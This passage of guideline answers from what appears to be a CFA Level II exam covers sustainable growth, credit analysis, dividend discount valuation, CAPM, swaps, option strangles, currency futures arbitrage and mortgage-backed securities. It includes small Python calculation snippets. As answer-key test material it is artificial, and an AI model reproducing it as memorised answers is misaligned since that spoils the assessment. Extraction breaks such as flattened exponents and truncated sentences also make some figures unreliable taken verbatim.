g = (Shareholders’ Equity2003 / Shareholders’ Equity2002) – 1
= ($1,475.16 / $1,440.64) – 1 = 1.02396 – 1 = 2.40%
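The PRAT calculation above can be sketched as follows, using the Jones Group figures quoted in the guideline answer and beginning-of-period equity (the guideline’s g*):

```python
# Sustainable growth rate, g = P x R x A x T (the PRAT decomposition above).
net_income = 122.69
sales = 1833.45
dividends = 88.18
assets = 3100.85
equity_begin = 1440.64

P = net_income / sales              # profit margin
R = 1 - dividends / net_income      # retention rate
A = sales / assets                  # asset turnover
T = assets / equity_begin           # financial leverage (beginning equity)

g = P * R * A * T
print(f"g = {g:.2%}")               # ~2.40%, the guideline's g*
```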
B. To remain on its desired growth curve, Jones Group management will need to make one or more of the following policy changes:
• issue new equity
• increase debt ratio (leverage)
• reduce payout ratio (increase retention rate)
• generate cash through profitable pruning of business units
• increase prices
• reduce costs through outsourcing or other means (increase operating efficiency)
• merge with another company that can provide excess cash flow or increased debt
capacity
C.
i. Profit margin: In the short-term, excess capacity will result in low profit margins. Until the excess capacity is utilized, the marginal revenues that DCom will generate as revenue growth continues will have a marginal cost close to zero. This will cause the profit margin of Jones Group to increase, which will result in a higher sustainable growth rate.
ii. Asset turnover: Because of the excess capacity, DCom’s asset turnover is very low. As revenue growth continues and capital expenditures decrease, asset turnover will increase, which will result in a higher sustainable growth rate for Jones Group.
LEVEL II, QUESTION 4
Topic: Asset Valuation
Minutes: 11
Reading References:
“Valuing Zero-Income Stocks: A Practical Approach,” Barney Wilson, Practical Issues in
Equity Analysis (AIMR, 2000), 2002 CFA Level II Candidate Readings
Purpose:
To test the candidate’s ability to: 1) understand when a bimodal distribution may be a better representation of the distribution of expected revenues for a high growth/high risk growth company, such as an Internet company, and 2) recognize the importance of, and difficulties in, establishing discount, growth, and fade rates when valuing high growth/high risk companies.

LOS: The candidate should be able to
“Valuing Zero-Income Stocks: A Practical Approach” (Study Session 12)
a) explain why a bimodal distribution better characterizes the prospects of a high growth/high risk company, such as an Internet related company;
b) discuss why it is difficult to apply a traditional present value model to the valuation of high growth/high risk companies because of discount rate and fade rate problems;
c) describe how a multiple-scenario DCF method combined with reality checks such as price-to-earnings ratios and market capitalization can improve an analyst’s ability to value high-growth/high risk companies.
Guideline Answer:
A. The shape of the probability distribution in Exhibit 4-1 is bimodal. Given the bimodal distribution of revenue growth rates, using the expected value of the revenue growth rate to value DCom may not be appropriate because the expected value:
• will not be the most likely outcome, and
• is not a plausible outcome for a single iteration of a bimodal scenario.
B. Beyond Tooley’s statement that scenario analysis is only useful for studying various alternative outcomes, Richardson’s scenario analysis is also useful in analyzing DCom, because:
• it can help Richardson identify the key drivers of DCom’s success or failure, such as revenue growth and market share, and
• as events occur that affect DCom, Richardson can evaluate how these events affect the probabilities assigned to the different scenarios and hence the probability of the company’s success or failure.
C. If the fade rate (the rate at which high or supernormal growth slows) is lower than forecasted, then higher earnings growth will be sustained longer into the future, leading to higher valuations. Specifically, revenues will be higher than forecasted, resulting in higher profitability (all else equal) and higher valuations.
LEVEL II, QUESTION 5
Topic: Asset Valuation
Minutes: 12
Reading References:
1. Investment Analysis and Portfolio Management, 6th edition, Frank K. Reilly and Keith
C.
Brown (Dryden, 2000)
A. “Analysis of Financial Statements,” Ch. 12
2. “General Principles of Credit Analysis,” Level II, Ch. 9, Fixed Income Analysis for the
Chartered Financial Analyst Program, Frank J. Fabozzi, (Frank J. Fabozzi Associates,
2000)
3. “Credit Analysis for Corporate Bonds,” Jane Tripp Howe, Ch. 20, pp. 371–392, The
Handbook of Fixed Income Securities, 5th edition, Frank J. Fabozzi, ed. (Irwin, 1997),
2002
CFA Level II Candidate Readings
Purpose:
To test the candidate’s understanding of corporate credit analysis for a bond issuer by discussing characteristics and issues with respect to financing rather than by calculating analytical data.
LOS: The candidate should be able to
“Analysis of Financial Statements” (Study Session 9)
g) compute return on equity (ROE) using the duPont system and the extended duPont system;
h) use financial ratios for comparative analysis of a company over time and relative to its industry or to the market.
“General Principles of Credit Analysis” (Study Session 14)
d) discuss sources of liquidity for a company and the importance of these sources in the credit analysis process;
h) discuss why and how cash flow from operations is used to assess the ability of an issuer to service its debt obligations and to identify the financial flexibility of a company;
j) explain the typical elements of the debt structure of a high-yield issuer, the interrelationships among these elements, and the impact of these elements on the risk position of the lender.
“Credit Analysis for Corporate Bonds” (Study Session 14)
c) analyze the components of a company’s return on equity (ROE) and explain the importance of expected earnings growth and ROE in determining credit quality.
Guideline Answer:
A. There are several effects on Jones Group’s creditworthiness if the one-year bank loan is used:
1. The bank loan may have a priority lien on Jones Group’s assets, making most existing or new-issue “senior” notes less secure. Less security implies a higher cost of funds in the future.
2. The short one-year maturity of the bank loan subjects Jones Group to a refunding time horizon that may be shorter than management considers optimal.
3. The variable interest rate on the bank loan subjects Jones Group to interest rate risk and volatility at a time when management may prefer locking in the cost of funds.
4. Profits can be positively or negatively affected depending on whether rates are lower or higher on the bank debt versus maturing debt. This will affect the earning capacity of the firm, as well as financial flexibility and therefore creditworthiness.
5. Financial flexibility and hence creditworthiness can be positively or negatively affected depending on whether and how covenants on bank debt differ from covenants on maturing debt.
B. There are several issues relating to the sale of Jones Group assets:
1. There is a time constraint, in that Jones Group needs to execute the sale of assets prior to the debt maturity to ensure that the funds will be available.
2. There may be a loss of control over operating assets required for the securitization for the asset-backed securities.
3. The asset sale may involve a lower cost of capital than other sources of financing.
4. Total cost of issuance may differ substantially, higher or lower, than other sources of financing.
5. Covenants on existing debt may limit/prohibit asset sales.
6. Effects of covenants on existing debt with respect to an asset sale, even absent violation, and on the securitized debt may adversely affect financial flexibility.
7. Any overcollateralization required by the rating agency to support securitization may potentially result in an insufficient amount of funds to refinance the maturing debt.
C. Considering the components of after-tax ROE, there are several possible explanations for after-tax ROE remaining constant while operating income was declining:
1. Decreasing operating income could have been offset by an increase in non-operating income (i.e., from discontinued operations, extraordinary gains or income, gains from changes in accounting policies) because both are components of profit margin (net income/sales).
2. Another offset to decreasing operating income could have been declining interest rates on any interest rate obligations, which would have decreased interest expense and allowed pre-tax margins to remain stable.
3. Leverage could have increased as a result of a decline in equity from: a) writing down an equity investment, b) stock repurchases, c) losses, or d) selling new debt. The effect of the increased leverage could have offset a decline in operating income.
4. An increase in asset turnover would also offset the decline in operating income. Asset turnover could increase as a result of the sales growth rate exceeding the asset growth rate, or from the sale or write-off of assets.
5. If the effective tax rate declined, the resulting increase in earnings after tax could offset a decline in operating income. The decline in effective tax rates could result from increased tax credits, the use of tax loss carry forwards, or a decline in the statutory tax rate.
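The offsetting effects above follow directly from the duPont decomposition, ROE = margin × turnover × leverage. A toy illustration with hypothetical numbers (not from the exam) shows how higher leverage can exactly offset a lower margin:

```python
# Hypothetical duPont illustration: ROE = profit margin x asset turnover x leverage.
def roe(margin, turnover, leverage):
    return margin * turnover * leverage

before = roe(margin=0.080, turnover=1.0, leverage=2.0)  # 16% ROE
after = roe(margin=0.064, turnover=1.0, leverage=2.5)   # margin falls, leverage rises
print(f"{before:.2%} {after:.2%}")                      # 16.00% 16.00%
```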
LEVEL II, QUESTION 6
Topic: Asset Valuation
Minutes: 18
Reading References:
Investment Valuation: Tools and Techniques for Determining the Value of Any Asset,
Aswath
Damodaran (Wiley, 1996)
A. “Dividend Discount Models,” Ch. 10
Purpose:
To test the candidate’s ability to calculate a two-stage DDM value for an established company’s equity.
LOS: The candidate should be able to
“Dividend Discount Models” (Study Session 10)
a) explain and calculate the value of a company’s equity using the dividend discount model (DDM), the Gordon growth model, the two-stage DDM, the H model, and the three-stage DDM.
Guideline Answer:
Because expected dividends exhibit two stages, a two-stage dividend discount model is appropriate. In the first stage, which includes 2002 and 2003, dividends are expected to be level at $0.74, which represents a 60 percent reduction from the 2001 dividend of $1.85. In the second stage, beginning in 2004, the dividend will be restored to its former $1.85 level and will grow at a constant 8 percent rate thereafter.

                                          2002     2003     2004    Terminal Value
Projected Dividend = Dn                  $0.74    $0.74    $1.85        $2.00
Dividend Growth Rate = g                                                   8%
Required Rate of Return = r               11%      11%      11%           11%
Terminal Value = (D2004 × (1 + g)) / (r – g)                           $66.67
Present Value of Dividends @ 11%         $0.67    $0.60    $1.35
Present Value of Terminal Value @ 11%                                  $48.75
Share price based on DDM                                               $51.37
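The two-stage valuation above can be sketched as follows. Note that the guideline rounds the 2005 dividend to $2.00 before capitalizing it, which nudges its terminal value ($66.67) and price ($51.37) slightly above the unrounded figures computed here:

```python
# Two-stage DDM: level $0.74 dividends in 2002-2003, $1.85 restored in 2004,
# then 8% constant growth thereafter, all discounted at 11%.
r, g = 0.11, 0.08
dividends = [0.74, 0.74, 1.85]                   # 2002, 2003, 2004

pv_divs = sum(d / (1 + r) ** t for t, d in enumerate(dividends, start=1))
terminal = dividends[-1] * (1 + g) / (r - g)     # value at end of 2004
pv_terminal = terminal / (1 + r) ** len(dividends)
price = pv_divs + pv_terminal
print(f"price = {price:.2f}")                    # ~51.32 unrounded (guideline: $51.37)
```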
LEVEL II, QUESTION 7
Topic: Asset Valuation
Minutes: 12
Reading Reference:
Valuing a Business: The Analysis and Appraisal of Closely Held Companies, 3rd edition,
Shannon P. Pratt, Robert F. Reilly, and Robert P. Schweihs (Irwin 1995)
A. “Minority Interest Discounts, Control Premiums, and Other Discounts and Premiums,”
Ch.
14, pp. 300-303 and 316-326
B. “Discounts for Lack of Marketability,” Ch. 15, pp. 331-334, 342-359
Purpose:
To test the candidate’s understanding of minority and/or marketability discounts.
LOS: The candidate should be able to
“Minority Interest Discounts, Control Premiums, and Other Discounts and Premiums” (Study Session 11)
a) describe the concept and importance of control;
d) discuss the impact of state statute provisions on minority versus control value;
e) discuss the top down, horizontal, and bottom up approaches for valuing minority interests;
f) discuss the market evidence with respect to control premiums and minority discounts.
“Discounts for Lack of Marketability” (Study Session 11)
d) describe the major factors affecting the discount for lack of marketability.
Guideline Answer:

For each of Rutherford’s statements, indicate whether the statement is correct or incorrect (circle one) and, if incorrect, justify the response with one reason.

1. “A common approach to valuing minority interests uses a ‘bottom up’ valuation method, which is similar to valuing publicly traded common stocks using the dividend discount model.”
Correct.

2. “Statutes enacted by some sovereign entities that increase the rights of minority shareholders usually serve to increase the magnitude of the minority discount.”
Incorrect. Sovereign entity statute provisions that increase the power of the minority holder will serve to reduce the magnitude of the discount that must be taken for a minority interest, because such provisions effectively reduce the differences in status between controlling and minority interests.

3. “Of the ‘top down,’ ‘horizontal,’ or ‘bottom up’ methods of valuing minority interests, both the ‘top down’ and ‘horizontal’ methods require an estimate of value for the total enterprise.”
Incorrect. Only the “top down” method requires that the entire enterprise be valued. The other methods only require that the minority interest be valued.

4. “In general, market control premiums are lower for strategic acquisitions than for financial acquisitions.”
Incorrect. Entities that acquire control for strategic reasons should be, and typically are, able to justify a higher premium than entities that acquire control for purely financial reasons. This is because the synergies that attach to a strategic acquisition are expected to result in higher returns to the acquiring entity than the returns that are to be obtained from a purely financial transaction.
LEVEL II, QUESTION 8
Topic: Portfolio Management
Minutes: 7
Reading Reference:
Investment Analysis and Portfolio Management, 6th edition, Frank K. Reilly and Keith C.
Brown
(Dryden, 2000)
B. “An Introduction to Portfolio Management,” Ch. 8
Purpose:
To test the candidate’s ability to: 1) identify and briefly describe several measures of risk, and 2) identify which measures are appropriate to measure the risk of a stand-alone asset versus a portfolio.

LOS: The candidate should be able to
“An Introduction to Portfolio Management” (Study Session 20)
b) identify several measures of risk and explain the circumstances in which their use might be appropriate in both stand-alone and portfolio contexts.
Guideline Answer:
A. The measure of risk that is most consistent with the client’s statement is “range of returns.” A major weakness of this measure is that it focuses on the extremes of the distribution, attaching excessive importance to these values. The range of returns measure ignores the shape of the distribution with respect to both expected value and volatility. In addition, this measure does not utilize a benchmark or market portfolio for comparison purposes to assess overall portfolio risk.

B. Portfolio A is more likely to achieve the client’s objective.
The client is risk averse and has strongly stated a minimum required rate of return or “floor” relative to achieving his retirement goals. Thus, the risk measure for assessing which portfolio is most appropriate for the client is one that focuses on downside risk. Exhibit 8-1 shows that portfolio A has a lower probability (27.54 percent) of failing to meet the client’s minimum required rate of return (8 percent average annual return) over a ten-year holding period, compared to portfolio B’s 45.92 percent probability of failing to earn 8 percent. The one-year holding period probabilities are not appropriate measures given the longer-term nature of the client’s objective.
LEVEL II, QUESTION 9
Topic: Portfolio Management
Minutes: 15
Reading References:
Investment Analysis and Portfolio Management, 6th edition, Frank K. Reilly and Keith C.
Brown
(Dryden, 2000)
A. “Efficient Capital Markets,” Ch. 7
C. “An Introduction to Asset Pricing Models,” Ch. 9
Purpose:
To test the candidate’s ability to: 1) distinguish between systematic and unsystematic risk, 2) describe the role of the market portfolio, and 3) use the SML to determine whether a security is undervalued, overvalued, or properly valued.

LOS: The candidate should be able to
“Efficient Capital Markets” (Study Session 20)
a) describe the set of assumptions that imply an efficient capital market.
“An Introduction to Asset Pricing Models” (Study Session 20)
a) distinguish between the original capital market theory assumptions and the revised assumptions that underlie the capital asset pricing model (CAPM);
g) calculate, based on the SML, the expected return for an asset;
i) determine, based on the SML, whether a security is undervalued, overvalued, or properly valued.
Guideline Answer:
A. Agree; Regan’s conclusion is correct. By definition the market portfolio lies on the capital market line (CML). Under the assumptions of capital market theory, all portfolios on the CML dominate, in a risk-return sense, portfolios that lie on the Markowitz efficient frontier because, given that leverage is allowed, the CML creates a portfolio possibility line that is higher than all points on the efficient frontier except for the market portfolio, which is Rainbow’s portfolio. Because Eagle’s portfolio lies on the Markowitz efficient frontier at a point other than the market portfolio, Rainbow’s portfolio dominates Eagle’s portfolio.
B. Unsystematic risk is the unique risk of individual stocks in a portfolio that is diversified away by holding a well-diversified portfolio. Total risk is composed of systematic (market) risk and unsystematic (firm-specific) risk.
Disagree; Wilson’s remark is incorrect. Because both portfolios lie on the Markowitz efficient frontier, neither Eagle nor Rainbow has any unsystematic risk. Therefore, unsystematic risk does not explain the different expected returns. The determining factor is that Rainbow lies on the (straight) line (the CML) connecting the risk-free asset and the market portfolio (Rainbow), at the point of tangency to the Markowitz efficient frontier having the highest available amount of return per unit of risk. Wilson’s remark is also countered by the fact that because unsystematic risk can be eliminated by diversification, the expected return to bearing it is zero. This happens as a result of well-diversified investors bidding the price of every asset up to the point at which only systematic risk earns a positive return (unsystematic risk earns no return).
C.
Furhman Labs: required rate of return E(R) = Rf + Beta × (Rm – Rf) = 5.0% + 1.5 × (11.5% – 5.0%) = 14.75%; Overvalued*
Garten Testing: required rate of return E(R) = Rf + Beta × (Rm – Rf) = 5.0% + 0.8 × (11.5% – 5.0%) = 10.20%; Undervalued*

*Supporting calculations:
Furhman: Forecast – Required = 13.25% – 14.75% = –1.50% (Overvalued)
Garten: Forecast – Required = 11.25% – 10.20% = 1.05% (Undervalued)
If the forecast return is less (greater) than the required rate of return, the security is overvalued (undervalued).
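The SML check above can be sketched as follows, using the betas and forecast returns given in the question:

```python
# CAPM required return compared with the analyst's forecast return:
# forecast above required -> undervalued; below -> overvalued.
def required_return(rf, beta, rm):
    return rf + beta * (rm - rf)

rf, rm = 0.05, 0.115
stocks = {"Furhman Labs": (1.5, 0.1325), "Garten Testing": (0.8, 0.1125)}

for name, (beta, forecast) in stocks.items():
    req = required_return(rf, beta, rm)
    verdict = "undervalued" if forecast > req else "overvalued"
    print(f"{name}: required {req:.2%}, forecast {forecast:.2%} -> {verdict}")
```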
LEVEL II, QUESTION 10
Topic: Portfolio Management
Minutes: 6
Reading Reference:
Investment Analysis and Portfolio Management, 6th edition, Frank K. Reilly and Keith C.
Brown
(Dryden, 2000)
C. “An Introduction to Asset Pricing Models,” Ch. 9
Purpose:
To test the candidate’s ability to discuss the security market line (SML) and explain how the SML differs from the CML.

LOS: The candidate should be able to
“An Introduction to Asset Pricing Models” (Study Session 20)
f) discuss the security market line (SML) and how it differs from the CML.

Guideline Answer:
B. McKay should substitute low beta stocks for high beta stocks to reduce the overall beta of York’s portfolio.
By reducing the overall portfolio beta, McKay will reduce the systematic risk of the portfolio and therefore its volatility relative to the market. Because York does not want to engage in borrowing or lending, McKay cannot reduce risk by selling equities and using the proceeds to buy risk-free assets (i.e., lending part of the portfolio).
LEVEL II, QUESTION 11
Topic: Portfolio Management
Minutes: 6
Reading Reference:
Investment Analysis and Portfolio Management, 6th edition, Frank K. Reilly and Keith C.
Brown
(Dryden, 2000)
D. “Extensions and Testing of Asset Pricing Theories,” Ch. 10
Purpose:
To test the candidate’s understanding of Roll’s concept of benchmark error.
LOS: The candidate should be able to
“Extensions and Testing of Asset Pricing Theories” (Study Session 20)
d) discuss why Roll’s critique of the CAPM and Shanken’s challenge to the APT cause many observers to consider the models to be untestable;
e) describe the concept of benchmark error.
Guideline Answer:
The effects of an incorrectly specified market proxy are that:
i. The beta of Black’s portfolio is likely to be underestimated (too low) relative to the beta calculated based on the “true” market portfolio. This is because the Dow Jones Industrial Average (DJIA) and other market proxies are likely to have less diversification and a higher variance of returns than the “true” market portfolio as specified by the capital asset pricing model. Consequently, beta computed using an overstated variance (Beta(portfolio) = Covariance(portfolio, market proxy) / Variance(market proxy)) will be underestimated.
ii. The slope of the security market line (SML), i.e., the market risk premium, is likely to be underestimated relative to the “true” market portfolio because the “true” market portfolio is likely to be more efficient (plotting on a higher return point for the same risk) than the DJIA and similarly misspecified market proxies. Consequently, the proxy-based SML would offer less expected return per unit of risk.
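The variance effect in point i can be illustrated with hypothetical numbers (not from the exam; in practice the covariance term also shifts with the proxy chosen, so this isolates only the denominator effect):

```python
# beta = Cov(portfolio, market) / Var(market): a less-diversified proxy with
# an overstated variance mechanically understates the computed beta.
cov_with_market = 0.030
var_true_market = 0.025    # "true", well-diversified market portfolio
var_proxy = 0.040          # less-diversified proxy (e.g., a DJIA-like index)

beta_true = cov_with_market / var_true_market    # 1.20
beta_proxy = cov_with_market / var_proxy         # 0.75
print(f"{beta_true:.2f} {beta_proxy:.2f}")       # 1.20 0.75
```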
LEVEL II, QUESTION 12
Topic: Asset Valuation
Minutes: 9
Reading Reference:
Futures, Options & Swaps, 3rd edition, Robert W. Kolb (Blackwell, 1999)
A. “The Swaps Market: Introduction,” Ch. 20, pp. 608-625 and pp. 632-643
B. “ The Swaps Market: Refinements,” Ch. 21, pp. 648-671
Purpose:
To test the candidate’s: 1) understanding of a plain interest rate swap and how it can be used to efficiently manage the balance sheet of a corporation, and 2) ability to replicate a plain vanilla swap with two bonds.
LOS: The candidate should be able to
“The Swaps Market: Introduction” (Study Session 17)
a) discuss the characteristics of and motivations for swap contracts and differentiate swap contracts from futures contracts, especially with respect to payment date versus expiration date;
b) diagram (with a box and arrow diagram) and explain the cash flows between the parties to a plain vanilla swap contract, including situations in which an intermediary participates;
e) illustrate the appropriate cash flow diagram for a swap and calculate the net borrowing/lending costs for the two swap counterparties.
“The Swaps Market: Refinements” (Study Session 17)
a) demonstrate how swap agreements can be viewed as a combination of capital market instruments.
Guideline Answer:
A. The instruments needed by Scott are a fixed-coupon bond and a floating rate note (FRN). The transactions required are to:
• issue a fixed-coupon bond with a maturity of three years and a notional amount of $25 million, and
• buy a $25 million FRN of the same maturity that pays one-year LIBOR +
positive or negative to Rone. Thus, the bond transactions are financially equivalent to a
plain
vanilla pay-fixed interest rate swap.
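The replication argument above can be sketched numerically. The FRN spread is truncated in the extracted text, so the fixed coupon and the LIBOR path below are hypothetical and the spread is omitted:

```python
# Issuing a fixed-coupon bond and buying a same-size FRN: the net annual cash
# flow (floating received minus fixed paid) is the payoff of a pay-fixed,
# receive-floating swap on the same notional. Principal exchanges at maturity
# cancel, since both bonds repay $25 million.
notional = 25_000_000
fixed_coupon = 0.06                     # hypothetical coupon on the issued bond
libor_path = [0.055, 0.062, 0.060]      # hypothetical one-year LIBOR resets

net_flows = [notional * (libor - fixed_coupon) for libor in libor_path]
for year, net in enumerate(net_flows, start=1):
    print(f"Year {year}: net = {net:+,.0f}")
```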
LEVEL II, QUESTION 13
Topic: Asset Valuation
Minutes: 17
Reading Reference:
Futures, Options & Swaps, 3rd edition, Robert W. Kolb (Blackwell, 1999)
A. “Option Payoffs and Option Strategies,” Ch. 11, pp. 316-346
C. “Option Sensitivities and Option Hedging,” Ch. 14, pp. 422-437
Purpose:
To test the candidate’s: 1) understanding of different option combinations, specifically strangle strategies, and 2) ability to relate delta and gamma to the price of a call option.
LOS: The candidate should be able to
“Option Payoffs and Option Strategies” (Study Session 18)
b) calculate the cost of the following option-trading strategies: straddle, strangle, bull and bear spreads, and butterfly spread;
c) determine, using a profit/loss diagram, the profit or loss of an option-trading strategy for any asset value.
“Option Sensitivities and Option Hedging” (Study Session 18)
c) calculate the change in option price, given delta and the change in asset price;
d) calculate delta, given the change in option price and the change in asset price;
k) relate gamma to changes in an option’s delta and stock price.
Guideline Answer:
A. Donie should choose the long strangle strategy.
A long strangle option strategy consists of buying a put and a call with the same expiration date and the same underlying asset. In a strangle strategy, the call has an exercise price above the stock price and the put has an exercise price below the stock price. An investor who buys (goes long) a strangle expects that the price of the underlying asset (TRT in this case) will either move substantially below the exercise price on the put or above the exercise price on the call. With respect to TRT, the long strangle investor buys both the put and call options for a total cost of $9.00, and will experience large profits if the stock price moves more than $9.00 above the call exercise price or $9.00 below the put exercise price. This strategy would enable Donie’s client to profit from a large move in the stock price, either up or down, in reaction to the expected court decision.
B. The put will just cover costs if the stock price finishes $9.00 below the put exercise price ($55.00 – $9.00 = $46.00), and the call will just cover costs if the stock price finishes $9.00 above the call exercise price ($60.00 + $9.00 = $69.00).
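The breakeven arithmetic above can be sketched as follows. The $60 call exercise price and $9.00 combined premium are quoted in the text; the $55 put exercise price is implied by the $46.00 breakeven:

```python
# Long strangle profit at expiration: long put payoff + long call payoff,
# less the combined premium paid.
def strangle_profit(s, put_k=55.0, call_k=60.0, cost=9.0):
    return max(put_k - s, 0.0) + max(s - call_k, 0.0) - cost

for s in (40.0, 46.0, 55.0, 69.0, 80.0):
    print(s, strangle_profit(s))   # profits: 6, 0, -9, 0, 11
```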
The following diagram provides support for the answers above.
[Figure: long strangle profit/loss diagram, Profit/Loss ($) versus Stock Price ($) from 35 to 80, with breakeven points at $46.00 and $69.00]
C. The delta for a call option is always positive, so the value of the call option in Exhibit 13-1 will increase if the stock price increases. Specifically, if the stock price increases by $1.00, the price of the call will increase by approximately $0.63:
ΔPrice(call) = 0.6250 × $1.00 = $0.625 increase
D. Gamma is the second derivative of the option price with respect to the stock price and measures how delta changes with changes in the underlying stock price.
The gamma for the put option in Exhibit 13-1 would increase if the stock price decreases to $57.00. Gamma is relatively small when an option is out-of-the-money but becomes larger as the option approaches near-the-money, which is the case as the underlying asset value moves down toward the put option’s $55 exercise price.
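The delta approximation from part C, and the second-order role of gamma from part D, can be sketched as follows. The 0.6250 call delta is the Exhibit 13-1 figure; the gamma value is hypothetical, for illustration only:

```python
# First-order change in option price ~ delta x change in stock price;
# gamma supplies the second-order correction as delta itself shifts.
delta_call = 0.6250
gamma_call = 0.04          # hypothetical gamma, not from the exhibit
d_stock = 1.00

first_order = delta_call * d_stock
second_order = first_order + 0.5 * gamma_call * d_stock ** 2
print(f"{first_order:.4f} {second_order:.4f}")   # 0.6250 0.6450
```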
LEVEL II, QUESTION 14
Topic: Asset Valuation
Minutes: 12
Reading Reference:
Futures, Options & Swaps, 3rd edition, Robert W. Kolb (Blackwell, 1999)
D. “Foreign Exchange Futures,” Ch. 9, pp. 261–266
Purpose:
To test the candidate’s ability to calculate the value of, and determine if there is an arbitrage opportunity available in, a currency futures contract.
LOS: The candidate should be able to
“Foreign Exchange Futures” (Study Session 17)
b) compute, using the cost-of-carry model, the theoretical futures price and determine whether an arbitrage profit exists;
d) compute the profits from an arbitrage strategy.
Guideline Answer:
A. The theoretical futures contract price is ¥122.0645, calculated as follows:
Futures price = Spot price × (1 + interest rate in the local market)^(compounding period) / (1 + interest rate in the foreign market)^(compounding period)
= ¥124.30000 × (1 + 0.0010)^0.5 / (1 + 0.0380)^0.5
= ¥124.30000 × (1.00049988 / 1.01882285)
= ¥122.06453
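The cost-of-carry pricing above can be sketched as follows. The guideline treats the yen rate as the "local" rate (the quote is yen per dollar) and the dollar rate as "foreign":

```python
# Covered-interest (cost-of-carry) futures price for a yen-per-dollar quote.
spot = 124.30
r_local, r_foreign = 0.0010, 0.0380   # annual rates; yen "local", dollar "foreign"
t = 0.5                               # half-year to expiration

futures = spot * (1 + r_local) ** t / (1 + r_foreign) ** t
print(f"{futures:.2f}")               # approximately 122.06
```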
B. The yen arbitrage profit is ¥129,928.61, calculated as follows:
Borrow $1,000,000 for 3 months @ 3.50%
Repay principal + interest = $1,000,000 × 1.0350.25 = $1,008,637.45
Exchange the $1,000,000 borrowed @ ¥124.30 / $1.00 = ¥124,300,000
Invest the ¥124,300,000 for 3 months at 0.50%
Receive principal + interest = 124,300,000 × 1.0050.25 = ¥124,455,084.52
Sell 3-month futures to pay off US$ denominated loan
Payoff (in ¥) = $1,008,637.45 × ¥123.2605 / $1.00 = ¥124,325,155.91
Yen arbitrage profit = Proceeds from yen investment – repayment (in ¥) of the US$ loan
= ¥124,455,084.52 – ¥124,325,155.91 = ¥129,928.61
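The three-month arbitrage above can be sketched end to end, using the rates and prices quoted in the guideline:

```python
# Covered-interest arbitrage: borrow dollars, convert at spot, invest in yen,
# and lock in the dollar repayment via the 3-month futures price.
spot = 124.30            # yen per dollar
futures_3m = 123.2605
usd_rate, jpy_rate = 0.035, 0.005
usd_borrowed = 1_000_000

usd_repay = usd_borrowed * (1 + usd_rate) ** 0.25
jpy_proceeds = usd_borrowed * spot * (1 + jpy_rate) ** 0.25
jpy_repay = usd_repay * futures_3m
profit = jpy_proceeds - jpy_repay
print(f"profit = {profit:,.2f} yen")   # close to the guideline's 129,928.61
```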
LEVEL II, QUESTION 15
Topic: Asset Valuation
Minutes: 12
Reading References:
Fixed Income Analysis for the Chartered Financial Analyst Program, Frank J. Fabozzi
(Frank J.
Fabozzi Associates, 2000)
A. “Mortgage-Backed Securities,” Level II, Ch. 3
B. “Asset-Backed Securities,” Level II, Ch. 4
Purpose:
To test the candidate’s understanding of the basic structures, cash flow characteristics, and methods of analysis of mortgage-backed securities (MBS) and asset-backed securities (ABS).
LOS: The candidate should be able to
“Mortgage-Backed Securities” (Study Session 16)
m) explain why and how a collateralized mortgage obligation (CMO) is created and distinguish among the different types of CMO structures (including sequential-pay tranches, accrual tranches, floater tranches, inverse floater tranches, planned amortization class tranches, support tranches, and support tranches with schedules);
o) explain, for planned amortization class (PAC) tranches, the initial PAC collar and the effective collar;
p) explain why the support tranches have the greatest prepayment risk in a CMO structure.
“Asset-Backed Securities” (Study Session 16)
b) explain the difference between an external and internal credit enhancement;
c) explain the different types of external credit enhancements (corporate guarantees, letter of credit, and bond insurance) and the problems associated with enhancing by means of third-party guarantors;
d) explain the different types of internal credit enhancements (reserve accounts and senior-subordinated structures);
g) describe the cash flow for securities backed by closed-end home equity loans, open-end home equity loans, manufactured housing loans, student loans, and Small Business Administration loans;
h) explain a prospectus prepayment curve for home equity loan-backed securities;
k) explain why prepayments that result from refinancing may not be significant for manufactured housing-backed securities and automobile loan-backed securities.
Guideline Answer:
A. i. External credit enhancements take the form of third-party guarantees that provide protection against losses up to a specified amount. The most common examples of external credit enhancement are:
• corporate guarantees, in which another corporation guarantees the performance of the underlying collateral,
• letters of credit from a bank, in which a bank issues a letter of credit supporting the performance of the collateral, and
• bond insurance, in which an insurance company writes a policy to cover losses to investors.
The underlying credit of the issue is only as good as the credit enhancement regardless of the quality of the loans.
ii. Internal credit enhancements take the form of internal structures that provide a cushion or support for credit losses. There are three common examples of internal credit enhancements.
• Reserve funds take the form of either cash reserves or excess servicing reserves. Cash reserves are created from issuance proceeds, and excess servicing reserves are accumulated over the life of the issue from the difference between the net coupon and the gross coupon. In either case a reserve is set aside for any possible future losses.
• Overcollateralization occurs when the issue is structured with collateral in excess of the total par value of the tranches. The amount of overcollateralization can be used to absorb losses, thereby shielding the tranches from losses up to the amount of the overcollateralization.
• Senior/subordinated structure occurs when an issue is offered with more than one tranche, where a senior tranche exists with a junior or subordinated tranche. The junior or subordinated tranche acts as the first tranche to incur losses, which protects the senior tranche.
B. The cash flows of the home equity loans will be much more affected (and the cash flows of the automobile receivables much less affected) by a decline in interest rates.
The cash flows of the home equity-backed ABS will be more affected because the home
equity ABS:
• exhibits high prepayment risk (those loans will be vulnerable to refinancing by
homeowners when rates decline), and
• is fairly new (short seasoning) and has not been exposed to a low rate environment.
The cash flows of the automobile receivable-backed ABS will be less affected because the auto ABS:
• does not typically exhibit prepayment risk (individuals do not tend to refinance car
loans), and
• also has an 18-month lockout that will protect it from receiving principal early.
C. With a decline in interest rates, prepayments would likely increase, and the two types of collateralized mortgage obligations (CMOs) would experience dramatically different effects.
i. Planned amortization class (PAC) CMOs are created to offer protection within a
designated band of Public Securities Association (PSA) prepayment rates. The PAC
tranche is protected from the initial stream of excess prepayments and thus should see
minimal prepayments.
ii. Support bonds are the class of CMO that takes the excess prepayment from the PAC
tranches to provide protection to the PACs. The support bonds will become very short in
average life and experience a rapid increase in the return of principal as the result of
accepting the excess cash flows from the PAC tranche.
LEVEL II, QUESTION 16
Topic: Asset Valuation
Minutes: 12
Reading Reference:
Fixed Income Analysis for the Chartered Financial Analyst Program, Frank J. Fabozzi (Frank J. Fabozzi Associates, 2000)
B. “Valuing Bonds with Embedded Options,” Level II, Ch. 2
Purpose:
To test the candidate's understanding of the characteristics and return profile of convertible bonds compared to those of the associated common equity.
LOS: The candidate should be able to
“Valuing Bonds with Embedded Options” (Study Session 15)
p) compute the value and explain the meaning of the following for a convertible bond: conversion value, straight value, market conversion price, market conversion premium per share, market conversion premium ratio, premium payback period, and premium over straight value;
q) discuss the components of a convertible bond's value that must be included in an option-based valuation approach;
r) compare the risk–return characteristics of a convertible bond with the risk–return
characteristics of ownership of the underlying common stock.
Guideline Answer:
